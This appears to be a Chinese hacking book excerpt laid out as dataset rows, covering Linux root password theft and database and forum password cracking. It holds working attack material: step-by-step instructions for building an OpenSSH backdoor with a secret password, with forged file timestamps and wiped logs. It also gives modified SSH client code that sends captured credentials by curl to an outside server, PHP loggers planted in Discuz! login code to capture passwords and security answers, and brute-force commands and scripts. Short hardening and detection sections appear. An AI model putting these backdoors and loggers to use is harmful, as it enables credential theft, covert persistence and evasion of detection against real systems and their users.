text
stringlengths 64
2.99M
|
---|
在获得网站WebShell权限的前提下,通过提权等方法可以获得系统权限,通过查看“/etc/shadow”文件的内容可以获取Linux操作系统的用户名和加密密码,但获取最高权限root用户的密码就比较困难。 |
本节的主要研究内容包括:使用普通用户权限记录root密码,使用SSH后门方法记录root密码,安装Rootkit后门程序记录root账号密码,通过John工具破解shadow密码,使用Sulog后门记录SU密码。 |
2.3.1 Linux密码的构成 在Linux系统中,涉及系统登录密码的重要文件有两个,分别是“/etc/passwd”和“/etc/shadow”,第1个文件记录用户信息,第2个文件真正保存用户密码信息。 |
“/etc/shadow”文件是“/etc/passwd”的影子文件,这个文件并不是由“/etc/passwd”产生的,这两个文件应该是对应互补的。 shadow的内容包括用户名及被加密的密码,以及其他“/etc/passwd”文件中不能包括的信息,如用户的有效期限等。 |
第1字段:用户名(也称为登录名),“/etc/shadow”文件中的用户名和“/etc/passwd”文件中的用户名是相同的,这样就把passwd和shadow中使用的用户记录联系在一起,这个字段是非空的。 |
第7字段:口令过期之后多少天禁用此用户。 此字段表示用户口令作废多少天后系统会禁用此用户,也就是说,系统不再让此用户登录,也不会提示用户过期,而是完全禁用。 第8字段:用户过期日期。 此字段指定了用户作废的天数(从1970年1月1日开始的天数),如果这个字段的值为空,则账号永久可用。 |
某系统root账号在“etc/shadow”文件中的表现方式为“root:$1$kbIAhX/ R$PiLL1U.n6bivtIr4oTi2y0:15377:0:99999:7:::”。 |
2.3.2 Linux密码文件的位置 绝大部分Linux操作系统的密码文件名称为shadow,但也有一些特殊的Linux/UNIX操作系统的密码文件名称为passwd,而且密码文件所在位置也不一样。 下面是一些常见Linux系统的密码文件位置。 |
1.查看密码的加密算法 Linux账户的密码加密后存放于“/etc/shadow”文件中。 Linux操作系统的密码采用的加密方式,取决于“/etc/pam.d/system-auth”或者“/etc/pam.d/passwd”文件中的定义,通过“more/etc/pam.d/ system-auth”或者“authconfig --test | grep hashing”命令可以获取操作系统使用的加密算法,目前有SHA-256、SHA-512和MD5加密算法。 在Red Hat Enterprise Linux Server中,可以通过“authconfig --test | grep hashing”命令获取当前系统账号的密码加密算法,如图2-12所示。 图2-12 获取Red Hat Enterprise Linux Server系统账号的加密算法 2.Linux/UNIX采用5种加密算法 Linux/UNIX操作系统目前采用5种加密算法,可以通过加密后的密码值来识别,主要是通过账号后面的$X进行判断。 |
$1表示MD5加密算法,$2表示使用Blowfish加密算法,$5表示使用SHA-256加密算法,$6表示使用SHA-512加密算法,其余为标准的DES。 例如,“root:$1$kbIAhX/R$PiLL1U.n6bivtIr4oTi2y0:15377:0:99999:7:::”的加密算法为MD5。 |
3.Linux密码操作 对于Linux密码操作,主要有增加、删除和修改,第一次添加用户时需要设定一个密码,修改密码使用“passwd”,删除用户时系统将自动删除设置的密码。 |
1.键盘记录获取法 根据操作系统内核版本,编译一个修改过的SSH或者内核键盘记录软件,早期的键盘记录软件有Keylogger、Keylog等。 在root账号下通过编译键盘记录程序或者执行编译好的键盘记录程序,当root用户登录时,程序自动捕获root账号输入的密码。 |
如果被控服务器是Linux服务器,目前通过开源软件比较难抓取SSH的密码(需要进行中间人攻击,Dsniff不具备中间人攻击的能力,而Windows下的Cain已实现伪造证书进行中间人攻击),所以,可以变通地通过抓取其他服务的密码获取root密码,如FTP、SMB。 |
(1)fakesu.c程序法 网上使用的kpr-fakesu.c(简称fakesu.c)程序由koper(koper@linuxmail.org)开发,程序最新版本为V0.9beta167。 |
该程序是在WebShell权限或者拥有普通账号的权限下,通过修改该程序中的配置文件,当前用户使用SU命令时,捕获具有root账号权限的密码,如图2-13所示。 |
1.在线网站破解法 通过提权或者其他方法获取root权限后,通过查看“/etc/shadow”文件的内容,将加密的密文提取出来,访问cmd5网站进行破解。 需要注意的是,提取的密文为第2字段,如“root:$1$kbIAhX/R$PiLL1U.n6bivtIr4oTi2y0:15377:0:99999:7:::”中的密文为“$1$kbIAhX/R$PiLL1U.n6bivtIr4oTi2y0”,将其放入cmd5网站进行破解即可,如图2-14所示。 |
图2-14 通过cmd5网站在线破解Linux密码 2.John软件破解法 John the Ripper Password Cracker(简称“John”)是一款Linux专用密码破解工具,网站地址为http://www.openwall.com/john/。 |
SSH是一项创建在应用层和传输层基础上的安全协议,为计算机上的Shell(壳层)提供安全的传输和使用环境。 SSH是目前较可靠的、专为远程登录会话和其他网络服务提供安全性的协议。 利用SSH协议可以有效防止远程管理过程中的信息泄露问题。 通过SSH可以对所有传输的数据进行加密,也能够防止DNS欺骗和IP地址欺骗。 SSH是Linux下最常见的一个服务,绝大多数操作系统安装后都会配置该服务。 通过连接SSH服务远程管理计算机,其默认端口为22。 |
Freebuf网站投稿者H3lvin的研究表明,10年前,一台服务器放在网络上,大概数周的时间才会被黑客光顾,而现在,一台服务器在网络中几个小时之内就会有黑客尝试攻击,且SSH暴力破解攻击经久不衰。 |
thc-hydra的最早版本为7.6(下载地址为https://www.thc.org/thc-hydra/),是一款著名的暴力破解工具,其常见SSH暴力破解命令为“hydra -l root -P /home/Linux/ passwd.dic -e ns -f -vV target_ip ssh2”。 |
SSH账号脚本暴力工具通过编程模拟实际登录进行暴力破解,常见的有theRandy撰写的SSH暴力破解程序,在Linux下通过执行“python sshCommand2.py -H 10.10.1.36 -u root -F dictionary. txt”命令对IP地址为10.10.1.36的服务器的root账号进行密码暴力破解。 |
2.3.6 Linux root账号密码破解防范技术 针对可能出现的获取Linux root账号的技术,可以通过安全防范技术和安全规范等进行防范,本节给出一些可供参考的方法和策略。 1.安全技术防范 (1)设置强健的账号密码安全策略 针对获取shadow值后进行密码破解,可以采取对系统普通账号和root账号设置强健的密码安全策略,定期执行安全检测和维护的方法来防范。 |
(2)定期升级系统补丁和应用程序补丁 对高风险业务程序做降权处理,尽量以低权限运行,如JBoss和Structs等,确保即使出现高危漏洞也不会危及root权限。 及时更新系统补丁和应用程序补丁,关注安全业界高危漏洞,防范通过Web应用程序漏洞直接获取root权限。 (3)定期对系统进行Rootkit专用检测 针对Rootkit程序可以通过Rootkit检测程序来防范,互联网上有Rootkit Hunter和Chkrootkit两款开源软件,可以检测绝大部分已知的Rootkit、嗅探和后门程序。 2.SSH账号防暴力破解 有关防范SSH账号被暴力破解,网上已经有很多方法,如修改SSH默认端口、采用RSA公钥认证、使用IPTables脚本、使用SSHD日志过滤、使用tcp_wrappers过滤及使用knockd等方法。 |
3.建立完善的入侵应急响应制度 对重点系统和重要系统定期聘请专业安全公司进行系统风险评估和安全检测,发现系统存在的漏洞和弱点,针对这些弱点和漏洞进行改进。 同时,建立入侵应急响应制度,针对各种可能出现的入侵情况,建立相应的处理措施。 |
2.3.7 小结 本节介绍了Linux密码的基本原理,以及常见的4种获取Linux root密码的方法,最后针对这些可能获取Linux root账号的方法给出了安全防范技术和防范策略。 通过这些安全技术和策略,可以大大降低系统被攻击后丢失最高root账号权限的风险,对Linux操作系统的安全维护和检测具有一定的参考价值。 |
未知 2.4 安全设置Linux操作系统的密码 在早期的Linux操作系统中,“/etc/passwd”文件包含系统中每个用户的信息。用户的口令虽然经过一定的数字和逻辑算法后作为一个运算结果(可见字符串)被放到passwd文件中,但加密强度并不大。于是,早期的黑客只要拿到“/etc/passwd”文件,就意味着系统已经攻破一半了。后来,随着安全级别的提高,出现了将passwd文件中的口令单独加密的情况,加密后的结果和其他辅助信息存储在shadow文件中。至于采用何种保存形式和加密算法,可以通过 /usr/sbin/authconfig程序设置。用户登录时输入的口令经计算后与“/etc/passwd”和“/etc/shadow”中的结果进行比较,符合则允许登录,否则拒绝登录。 一个强壮、有效的口令应当至少包含8个字符。不要使用个人信息(如生日、名字、用户名、电话号码等)作为口令,计算机型号等尽量不要出现在密码中,普通的英语单词也不适合作为口令(因为可以采用字典攻击法)。口令中最好有一些非字母字符(如数字、标点符号、控制字符等),尽量不要将口令写在纸上或存放在计算机文件中。设置口令的一个好方法是将不相关的字母和数字或控制字符相连,长度不少于8位。 2.4.1 修改login.defs中的参数 为了强制用户指定足够强壮的密码,需要修改“/etc/login.defs”文件的PASS_ MIN_LEN参数(口令最小长度)。同时,应限制口令的使用时间,保证定期更换口令,建议修改PASS_MIN_DAYS参数(口令使用时间)。login.defs文件的参数设置如图2-15所示。 图2-15 login.defs文件的参数设置 2.4.2 设置加密算法 Linux账户的密码加密后存放于“/etc/shadow”文件中。Red Hat Enterprise Linux默认使用MD5算法,但目前这个算法已经很不安全了。很多经典的黑客教程给出的方法都是拿到shadow文件后破解root用户的密码,如果能用更难破解的SHA算法加密密码无疑可以提高服务器的安全性。 以下方法综合了http://www.cyberciti.biz/faq/rhel-centos-fedora-linux-upgrading-password-hashing/和http://kbase.redhat.com/faq/docs/DOC-15806两篇文章的内容,且针对Red Hat Enterprise Linux 5.2以上版本。 显示当前密码加密算法,代码如下,输出“password hashing algorithm is md5”。 # authconfig --test | grep hashing 设置使用SHA512算法,代码如下。 # authconfig --passalgo=SHA512 --update 在笔者的Red Hat Enterprise Linux 5.3中,提示“unknown algorithm sha512”,使用了SHA512算法,原因不明。再次显示,就更改为SHA256算法。 最后,对所有用户都需要重新设置密码才能生效。可以使用“# chage -d 0 userName”命令强制所有用户在下次登录时修改密码。 在笔者使用的Arch Linux中,设置方法与以上稍有不同,具体如下(参考了http:// wiki.archlinux.org/index.php/SHA_Passwords的内容)。 修改“/etc/pam.d/passwd”文件,代码如下。 #%PAM-1.0 #password required pam_cracklib.so difok=2 minlen=8 dcredit=2 ocredit=2 retry=3 #password required pam_unix.so md5 shadow use_authtok password required pam_unix.so md5 shadow nullok 把最后一行的md5值用SHA256算法替换。 然后,修改“/etc/default/passwd”文件,将“CRYPT=des”修改为“CRYPT=sha256”。最后,强制所有用户重新修改密码。 2.4.3 破解Linux密码 Linux使用的是DES(加密函数式是Crypt)或MD5(函数式是Md)加密算法,由于计算量非常大,所以很难被逆向或破解。DES口令的密文是由13个ASCII字符组成的字符串,而MD5口令密文的起始字符总是“$1$”。 如图2-16所示是一个被攻陷的红帽系列的Linux操作系统,入侵者远程溢出服务器后获得了一个root权限的登录界面。 图2-16 被入侵的Linux操作系统 如何获取root用户的密码呢?入侵者打开了“/etc/passwd”文件,如图2-17所示。 图2-17 查看etc/passwd文件 看来,主机的账户使用了shadow加密。继续查看“/etc/shadow”文件,如图2-18所示,“root”行的冒号后面就是加密后的密码。 图2-18 获取加密的密码字符串 现在就可以开始破解了。 破解Linux口令的工具很多,如John the Ripper、Crack by Alex Muffett和Cracker Jack等,其中John the Ripper的功能最为强大,速度也最快。 将“/etc/shadow”文件下载到本地,先使用John the Ripper的简单模式尝试一下,但没有得到结果,如图2-19所示。 图2-19 使用John the Ripper破解密码 加载一个字典,看看情况。这里使用“-w=1.txt”命令指定字典文件。很快,root密码被破解了,结果是“bigapple”,如图2-20所示。 图2-20 成功破解密码 |
未知 2.5 Linux OpenSSH后门获取root密码 相对于Windows操作系统,Linux操作系统的密码较难获取,而很多Linux服务器都配置了OpenSSH服务。 在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号和密码,甚至可以留下一个隐形的后门,达到长期控制Linux服务器的目的。 很多入侵者在攻破一个Linux系统后,都会在系统中留下后门,用OpenSSH留后门是入侵者的惯用方式之一。 OpenSSH后门比较难检测,本节将对如何添加及防范OpenSSH后门进行探讨。 |
很多人误认为OpenSSH与OpenSSL有关联,但实际上这两个计划有不同的目的和不同的发展团队,名称相近只是因为两者有同样的发展目标──提供开放源代码的加密通信软件。 |
OpenSSH是OpenBSD的子计划,其官方网站地址为http://www.openssh.com/。 OpenSSH的各个版本可以到其官网下载。 另外笔者推荐一个下载地址:http://ftp5.eu. openbsd.org/ ftp/pub/OpenBSD/OpenSSH/。 |
OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控件和文件传输过程中的数据,并由此来代替原来的类似服务。 OpenSSH是通过计算机网络使用SSH加密通信的实现,是取代由SSH Communications Security提供的商用版本的开放源代码方案。 在OpenSSH服务中,sshd是一个典型的独立守护进程,OpenSSH服务可以通过“/etc/ssh/sshd_config”文件进行配置。 |
2.5.2 准备工作 01 下载openssh-5.9p1.tar.gz openssh-5.9p1.tar.gz的下载地址为http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz。 |
04 查看SSH当前版本信息 目前网上支持的SSH后门版本为5.9以下。 如图2-21所示,使用“ssh -V”命令获取的OpenSSH版本信息为“OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010”。 |
图2-22 备份SSH原始配置文件 mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 06 解压SSH后门 将sshbd.tgz下载到本地并解压,如图2-23所示,执行以下命令。 tar zxvf sshbd.tgz cd openssh 图2-23 下载并解压SSH后门 如果使用官方安装包openssh-5.9p1进行安装,可以执行以下命令。 tar zxf openssh-5.9p1.tar tar zxf openssh-5.9p1.path.tar cp openssh-5.9p1.patch/sshbd5.9p1.diff /openssh-5.9p1 cd openssh-5.9p1 patch < sshbd5.9p1.diff 2.5.3 设置SSH后门的登录密码及其密码记录位置 在OpenSSH目录中找到includes.h文件,运行“vi includes.h”命令修改“define _SECRET_PASSWD”为我们的登录密码,如图2-24所示,默认密码记录日志文件保存在“/usr/local/share/0wn”目录下的slog和clog文件中。 |
./configure –prefix=/usr –sysconfdir=/etc/ssh make && make install openssh-5.9p1需要使用下面的命令进行配置。 ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 在编译过程中可能会出现“configure: error: *** zlib.h missing – please install first or check config.log”错误。 此时,执行“yum install zlib-devel”和“yum install openssl openssl-devel”命令,安装后再次进行编译即可。 02 重启SSHD服务 执行“/etc/init.d/sshd restart”命令,重启SSHD服务。 03 还原新配置文件为旧配置文件的时间 执行以下命令,使ssh_config和sshd_config文件的修改时间与ssh_config.old和sshd_config.old文件一致。 touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config mtime(modify time):最后一次修改文件或目录的时间。 |
2.5.5 登录后门并查看记录的密码文件 使用“ssh -l root IP”命令登录服务器,如“ssh -l root 192.168.52.175”。 可以使用root的密码,也可以使用后门设置的密码“995430aaa”进行登录。 然后,访问“/usr/local/ share/0wn”目录,查看其记录的密码日志文件clog和slog,如图2-25所示,可以看到SSH登录和本地root账号登录的密码。 |
export HISTFILE=/dev/null export HISTSIZE=0 cd /etc/httpd/logs/ sed -i ‘/192.168.52.175/d’ access_log* echo >/root/.bash_history //清空操作日志 2.5.6 拓展密码记录方式 前面记录的密码只能在Linux服务器上面看,也就是说,用户必须拥有读取文件的权限,如果没有权限则无法登录服务器。 |
01 接收端ssh.php代码 <?php $username = $_POST['username']; $password = $_POST['password']; $host = $_POST['host']; $port = $_POST['port']; $time=date('Y-m-d H:i:s',time()); if(isset($username) != "" || isset($password) !="" || isset($host) != "") { $fp = fopen("sshlog.txt","a+"); $result = "sername:.$username--->:Password:$password----->:Host:$host ----->:port:$port----->:time:$time"; fwrite($fp,$result); fwrite($fp,"\r\n"); fclose($fp); } 02 修改auth-passwd.c文件的内容 int userauth_passwd(Authctxt *authctxt) { static int attempt = 0; char prompt[150]; char *password; char *pass[200]; char szres[1024] = {0}; FILE *f; char *findport() { FILE *FTopen; char tempBuf[1024] = {0}; char *Filename = "/etc/ssh/sshd_config"; char *Filetext = "Port"; if((FTopen = fopen(Filename, "r")) == NULL) { return Filetext; } while(fgets(tempBuf, 1024, FTopen) != NULL) { if(strstr(tempBuf, Filetext)) { Filetext = tempBuf; break; } memset(tempBuf, 0, 1024); } fclose(FTopen); return Filetext; } const char *host = options.host_key_alias ? options.host_key_alias : authctxt->host; if (attempt++ >= options.number_of_password_prompts) return 0; if (attempt != 1) error("Permission denied, please try again."); snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ", authctxt->server_user, host); password = read_passphrase(prompt, 0); strcpy(pass,password); //截取密码的时候把它复制到自定义的地方,以便调用 packet_start(SSH2_MSG_USERAUTH_REQUEST); packet_put_cstring(authctxt->server_user); packet_put_cstring(authctxt->service); packet_put_cstring(authctxt->method->name); packet_put_char(0); packet_put_cstring(password); memset(password, 0, strlen(password)); xfree(password); packet_add_padding(64); packet_send(); dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ, &input_userauth_passwd_changereq); if((f=fopen("/tmp/olog","a+"))!=NULL){ fprintf(f,"username:%s-->password:%s-->host:%s-->port:%s\n", authctxt->server_user,pass,authctxt->host,findport()); fclose(f);} memset(szres,0,sizeof(szres)); snprintf(szres,sizeof(szres),"/usr/bin/curl -s -d \"username=%s&password= %s&host=%s&port=%s\" http://www.antian365.com/ssh.php >/dev/null",authctxt-> server_user,pass, authctxt->host,findport()); system(szres); return 1; } 重新编译,执行后会自动将密码发送到服务器。 |
使用strace命令找出SSH后门。 运行“ps aux | grep sshd”命令获取可疑进程的PID,运行“strace -o aa -ff -p PID”命令进行跟踪,成功登录SSH后,在当前目录下就生成了strace命令的输出。 |
在上面的命令中,过滤错误信息、/dev/null信息和拒绝(denied)信息,找出打开了读写模式(WR)的文件(因为要把记录的密码写入文件)。 |
wget http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz 备份SSH配置文件,命令如下。 mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 安装必备软件,命令如下。 yum install -y openssl openssl-devel pam-devel zlib zlib-devel 解压并安装补丁,命令如下。 tar zxf openssh-5.9p1.tar.gz tar zxf openssh-5.9p1.tar.gz cp openssh-5.9p1.patch/sshbd5.9p1.diff /openssh-5.9p1 cd openssh-5.9p1 patch < sshbd5.9p1.diff 修改includes.h文件中记录用户名和密码的文件位置及其密码,命令如下。 |
#define ILOG "/tmp/ilog" //记录登录本机的用户名和密码 #define OLOG "/tmp/olog" //记录本机登录远程的用户名和密码 #define SECRETPW "123456654321" //后门的密码 修改version.h文件,使其修改后的版本信息为原始版本,命令如下。 |
#define SSH_VERSION "填入之前记下来的版本号,伪装原版本" #define SSH_PORTABLE "小版本号" 安装并编译,命令如下。 ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 make clean make && make install service sshd restart 恢复新配置文件的日期,使其与旧文件的日期一致。 对ssh_config和sshd_config文件的内容进行对比,使其配置文件一致,然后修改文件日期。 touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 清除操作日志,代码如下。 export HISTFILE=/dev/null export HISTSIZE=0 cd /etc/httpd/logs/ sed -i ‘/192.168.52.175/d’ access_log* echo >/root/.bash_history //清空操作日志 参考文章 如何使用Linux通用后门,http://www.freebuf.com/tools/10474.html。 |
未知 第3章 数据库密码的获取与破解 在网络渗透过程中,数据库历来属于“兵家必争之地”。数据库是企业的核心,很多重要数据都保存在数据库中,一旦黑客入侵并掌握了数据库的连接口令,就意味着数据的泄露。网上经常看见的“某某公司某某漏洞导致百万条数据泄露”的新闻,往往就是由数据库密码泄露造成的。 本章着重介绍Access数据库破解、MD5加解密、通过网页文件获取数据库账号和口令、对MySQL和SQL Server数据库进行扫描等内容。 本章主要内容 Discuz! 论坛密码记录及安全验证问题暴力破解 Access数据库破解实战 巧用Cain破解MySQL数据库密码 MD5加密与解密 MD5(base64)加密与解密 通过网页文件获取数据库账号和口令 SQL Server 2000口令扫描 MySQL口令扫描 巧用Cain监听网络获取数据库口令 MySQL数据库提权 SQL Server数据库的还原 使用SQLRootKit网页数据库后门控制 |
未知 3.1 Discuz! 论坛密码记录及安全验证问题暴力破解 Discuz!是目前最好用的论坛程序之一,在Discuz!论坛用户注册过程中设置了安全问题和安全答案进行安全保护,因此,即使攻击者获取了数据库,也会由于不知道安全问题的答案而止步。 |
近年来,由于密码泄露事件的影响和社工库的普及,用户和管理员大都设置了安全验证,所以,获取用户的安全验证问题就非常有必要了。 目前,获取用户的安全验证问题的主要方式有两种:一种是通过修改源程序,在其中加入记录代码,截获所有登录用户的登录密码、安全问题和答案; |
3.1.1 Discuz! 论坛密码记录程序的编写及实现 在源程序中加入记录代码的方式相对简单,具体如下。 1.Discuz! 7.1-7.2论坛记录程序的编写及实现 在Discuz! 7.2论坛中找到程序文件login.func.php,在其中加入以下代码。 |
$ip=$_SERVER['REMOTE_ADDR']; $showtime=date("Y-m-d H:i:s"); $record="<?exit();?>".$username." --------".$password." IP:".$ip."questionid". $questionid."answer".$answer." Time:".$showtime."\r\n"; $handle=fopen('./include/csslog.php','a+'); $write=fwrite($handle,$record); 密码记录和登录文件保存在“include”目录下的cssog.php文件中,打开csslog.php文件即可看到获取的用户记录,如图3-1所示。 |
图3-1 Discuz!7.2论坛密码及验证问题记录 2.Discuz! X2.5-3.1论坛记录程序的编写及实现 在Discuz! X2.5-3.1安装目录的“uc_client”文件夹下找到client.php文件,在“unction uc_user_ login”函数中加入以下代码。 //以下为密码记录程序代码 if(getenv('HTTP_CLIENT_IP')) { $onlineip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR')) { $onlineip = getenv('REMOTE_ADDR'); } else { $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR']; } if(getenv('HTTP_CLIENT_IP')) { $onlineip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR')) { $onlineip = getenv('REMOTE_ADDR'); } else { $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR']; } $ip=$onlineip; $showtime=date("Y-m-d H:i:s"); $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$ip." Time:".$showtime." questionid:".$questionid."answer:".$answer."\r\n"; $handle=fopen('./api/csslog.php','a+'); $write=fwrite($handle,$record); //密码记录程序代码结束 用户登录后查看127.0.0.1/api/csslog.php文件,即可获取密码及验证问题答案等信息,效果如图3-2所示。 |
X2.5论坛密码及其验证程序记录效果 图3-3 问题ID对应 3.1.2 Discuz! X2.5密码安全问题 下面我们一起了解一下Discuz! X2.5论坛密码的安全问题。 |
图3-4 查看Secques值 图3-5 查询管理员的密码 2.密码安全问题的设置和解除 密码登录安全提问是用户注册成功后通过再次设置“密码安全”实现的。 |
如图3-6所示,Discuz!默认设置了7个安全验证问题,用户只需要选择问题,然后设置对应的答案即可,论坛最高管理员或者创建人可以直接将安全提问清除。 设置安全验证问题后,用户登录时除了需要输入用户名和密码外,还需要选择自己设置的安全问题并输入相应的答案,如图3-7所示。 图3-6 设置安全问题 图3-7 用户登录安全问题验证 3.1.3 Discuz! X2.5密码安全问题的暴力破解 暴力破解程序代码如下。 <? /*discuz提示问题答案暴力破解程序。 |
*/ error_reporting(0); if($argc<2){ print_r(' -------------------------- Usage: php cracksecques.php hash Example: php cracksecques.php ca9e47ea -------------------------- '); die;} $fd=fopen("pass.dic",r); if(!$fd){ echo "error:打开字典文件错误"; die;} while($buf=fgets($fd)){ for($i=1;$i<8;$i++) { $tmp=substr(md5(trim($buf).md5($i)),16,8); $conn=strcmp($tmp,$argv[1]); if($conn==0) { echo "密码破解成功!\n"."提示问题答案为:".$buf."提示的问题为:".theask ((int)$i)."\n"; die;}}} if($conn!=0){echo"没有正确的密码!";} fclose($fd); function theask($var){ if($var==1){return"母亲的名字"; } elseif($var==2){return"爷爷的名字";} elseif($var==3){return"父亲出生的城市"; } elseif($var==4){return"您其中一位老师的名字";} elseif($var==5){return"您个人计算机的型号"; } elseif($var==6){return"您最喜欢的餐馆名称"; } elseif($var==7){return"驾驶执照最后四位数字";} } ?> 将以上程序代码保存为文件crackdzsecques.php,在Windows下通过“php crackdzsecques.php ca9e47ea”命令进行破解,pass.dic为生成的字典,如图3-8所示。 |
关系数据库由一系列表组成,表又由一系列行和列组成,每一行是一个记录,每一列是一个字段,每个字段有一个字段名,字段名在一个表中不能重复。 |
3.2.1 Access数据库简介 下面我们了解一下Access数据库的特点及其局限性。 1.Access数据库的主要特点 Access数据库的主要特点如下。 存储方式单一:Access管理的对象有表、查询、窗体、报表、页、宏和模块,以上对象都存放在后缀为.mdb的数据库文件中,便于用户进行操作和管理。 面向对象:Access是一个面向对象的开发工具,利用面向对象的方式将数据库系统的各种功能对象化,将数据库管理的各种功能封装在各类对象中。 |
通过对象的方法、属性完成数据库的操作和管理,极大简化了用户的开发工作。 同时,这种基于面向对象的开发方式使得开发应用程序更为简便。 |
系统还提供了表生成器、查询生成器、报表设计器及数据库向导、表向导、查询向导、窗体向导、报表向导等工具,操作简便,容易使用和掌握。 |
该环境集成了各种向导和生成器工具,极大地提高了开发人员的工作效率,使建立数据库、创建表、设计用户界面、设计数据查询、报表打印等可以方便、有序地进行。 |
支持ODBC(Open Data Base Connectivity,开放数据库互联):利用Access强大的DDE(动态数据交换)和OLE(对象的链接和嵌入)特性,可以在一个数据表中嵌入位图、声音、Excel表格、Word文档,还可以建立动态的数据库报表和窗体等。 |
2.Access数据库的缺点和局限性 Access是一种桌面数据库,适合数据量少的应用,在处理少量数据和单机访问时很好用,效率也很高,但在处理海量数据时效率会受到极大影响。 例如,搭配ASP应用于互联网时,如果调用数据库的程序设计不理想,Access数据库超过30MB就开始影响性能,50MB左右的时候性能会急剧下降,即使配合设计优良的程序,数据库的极限大小也只能是几百MB。 |
另外,Access数据库在安全性方面也比不上MySQL、MSSQL等专业数据库,配合ASP程序使用的时候,如果使用默认的.mdb文件后缀而且没有经过额外的安全处理,别人甚至可以直接下载我们的数据库文件。 |
3.2.2 Access数据库密码破解实例 在一些软件系统和网站系统中,出于安全考虑,很多程序设计者都会给Access数据加上密码,以保护数据库内容的安全。 |
01 选择需要破解的Access数据库文件 笔者推荐一款Access数据库密码破解工具——Access数据库特殊操作。 如图3-9所示,运行“Access数据库特殊操作”后,在软件窗口单击“破解Access密码”标签,然后在Access文件路径中选择需要破解的文件,也可以直接输入Access文件路径。 图3-9 选择需要破解的Access文件 02 获取数据库密码 单击“破解密码”按钮,软件很快就将Access数据库密码破解。 |
图3-10 破解Access数据库密码 03 删除数据库密码 在软件窗口单击“删除Access的密码”标签,如果前面选择过数据库,则在“数据库路径”设置框中会显示上次操作的数据库,同时显示数据库的密码,单击“删除密码”按钮将加密的数据库密码删除,如图3-11所示。 |
Access数据库长时间持续运行后,文件本身会增加一些无用的信息,导致数据文件非常大,而对Access数据库来说,当数据库大小超过30MB就会影响性能,超过50MB会严重影响性能,因此,当数据库“个头”太大时,就需要给它“减肥”。 |
未知 3.3 巧用Cain破解MySQL数据库密码 MySQL数据库用户的密码与其他数据库用户的密码一样,在应用系统代码中都是以明文形式出现的,在获取文件读取权限后即可直接从数据库连接文件中读取。 例如,ASP代码中的conn.asp数据库连接文件中一般都包含数据库类型、物理位置、用户名和密码等信息,而在MySQL中,即使获取了某一个用户的数据库用户(root用户除外)的密码,也只能操作某一个用户的数据库中的数据。 在实际攻防过程中,在获取WebShell的情况下,可以直接下载MySQL数据库中的user.myd文件,该文件中保存的是MySQL数据库中所有用户对应的数据库密码,只要能够破解这些密码,就可以正大光明地操作这些数据了。 虽然网上有很多修改MySQL数据库用户密码的方法,但大都不可取,因为修改用户密码的事情很容易被人发现! |
设想一下:一旦获取了网站的部分权限,如果能够获取MySQL中保存的用户数据,那么解密后即可通过正常途径访问数据库,一方面可以直接操作数据库中的数据,另一方面可以用来提升权限。 目前关于破解MySQL方面的研究还不是很多,本节算是抛砖引玉,虽然效果不是特别好,但也算是对破解MySQL数据库用户密码的一种探讨和尝试。 3.3.1 MySQL的加密方式 MySQL数据库的认证密码有两种方式,MySQL 4.1之前是MySQL323加密,MySQL 4.1及之后的版本都是MySQLSHA1加密。 MySQL数据库自带Old_Password(str)和Password(str)函数,它们均可以在MySQL数据库里进行查询,前者是MySQL323加密,后者是MySQLSHA1加密。 1.以MySQL323方式加密 以MySQL323方式加密,示例如下。 |
MYSQLSHA1 = *A2EBAE36132928537ADA8E6D1F7C5C5886713CC2 执行结果如图3-13所示,MYSQL323加密生成的是16位字符串,而MySQLSHA1加密生成的是41位字符串,其中“*”不参加实际的密码运算。 通过观察发现,很多用户都携带了“*”,在实际破解过程中需要去掉“*”,也就是说,MySQLSHA1加密密码的实际位数是40位。 图3-13 在MySQL数据库中查询同一密码的不同SHA值 3.3.2 MySQL数据库文件结构 MySQL数据库的文件结构情况如下。 |
MySQL数据库的用户密码都保存在user.MYD文件中,包括root用户和其他用户的密码。 图3-14 MySQL数据库用户密码文件 3.3.3 破解MySQL数据库密码 01 获取MySQL数据库用户密码加密字符串 使用UltraEdit-32编辑器直接打开user.MYD文件,使用二进制模式查看。 如图3-15所示,在root用户后面是一串字符串,选中这些字符串并将其复制到“记事本”中,这些字符串即为用户加密值,本例为“506D1427F6F61696B4501445C90624897266DAE3”。 图3-15 获取加密的字符串 注意 (1)root后面的“*”不要复制到字符串中。 |
